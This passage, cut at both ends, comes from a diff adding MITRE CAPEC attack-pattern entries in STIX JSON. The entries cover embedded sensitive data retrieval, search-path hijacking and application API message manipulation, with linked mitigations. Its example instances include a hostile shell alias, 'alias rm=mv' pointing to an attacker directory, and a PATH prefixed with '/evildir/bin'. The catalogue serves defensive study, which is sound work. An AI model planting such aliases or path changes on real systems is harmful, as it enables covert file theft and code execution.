"CAPEC-37", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/37.html" + }, + { + "external_id": "CWE-226", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-525", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/525.html" + }, + { + "external_id": "CWE-312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/312.html" + }, + { + "external_id": "CWE-314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/314.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1301.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + } + ], + "id": "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Retrieve Embedded Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be.", + "An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.", + "Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), configuration files, or other system files.

    2. Techniques
    Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.
    Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack.

Exploit

  1. Retrieve Embedded Data: The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to retrieve the information of interest.

    2. Techniques
    API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information.
    Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.
    Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.
    Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, they attempt decoding in that format.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "In order to feasibly execute this type of attack, some valuable data must be present in client software.", + "Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, or other attack." + ], + "x_capec_resources_required": [ + "The attacker must possess access to the system or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as \"Strings\" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources." + ], + "x_capec_skills_required": { + "Medium": "The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.", + "external_references": [ + { + "external_id": "CAPEC-38", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/38.html" + }, + { + "external_id": "CWE-426", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/426.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow: Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "Hijack Execution Flow: Path Interception by Unquoted Path", + "external_id": "T1574.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/009" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Leveraging/Manipulating Configuration File Search Paths", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \"rm\" could be aliased to \"mv\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting\n alias rm=mv /usr/home/attacker\n In this case the attacker retains a copy of all the files the victim attempts to remove.\n ", + "\n A standard UNIX path looks similar to this\n /bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:\n /evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to redirect search paths on the victim host." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef4b6415-f24e-432a-9f51-eb19c515d326", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program", + "id": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring", + "id": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c212a3ad-89fe-4eec-b57a-6c1471eb8a8a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a \"virtual sale\" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.", + "external_references": [ + { + "external_id": "CAPEC-383", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/383.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-419", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/419.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Input Capture: Credential API Hooking", + "external_id": "T1056.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/004" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Harvesting Information via API Event Monitoring", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to gather information to potentially support further nefarious activities.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_prerequisites": [ + "The target software is utilizing application framework APIs" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind.", + "id": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-383-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c553bedf-6dd2-4f6e-bb3f-680cd65f2c57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "target_ref": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true \"Adversary-in-the-Middle\" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.", + "external_references": [ + { + "external_id": "CAPEC-384", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Message Manipulation via Man-in-the-Middle", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.", + "external_references": [ + { + "external_id": "CAPEC-386", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/386.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Navigation Remapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.", + "external_references": [ + { + "external_id": "CAPEC-387", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/387.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Navigation Remapping To Propagate Malicious Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n Performing this attack allows the adversary to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the adversarys' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the adversarys' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the adversary to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system in order to change the destination of various application interface elements.\n ", + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.", + "external_references": [ + { + "external_id": "CAPEC-388", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/388.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Application API Button Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. The attacker, using a MITM proxy, observes the following data:\n [Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]\n By altering the destination of \"Claim_Link\" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking \"Yes\" or \"No\" causes the user to load the attackers' code.\n " + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a adversary-in-the-middle (CAPEC-94) proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.", + "external_references": [ + { + "external_id": "CAPEC-389", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/389.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Content Spoofing Via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.", + "external_references": [ + { + "external_id": "CAPEC-39", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/39.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { 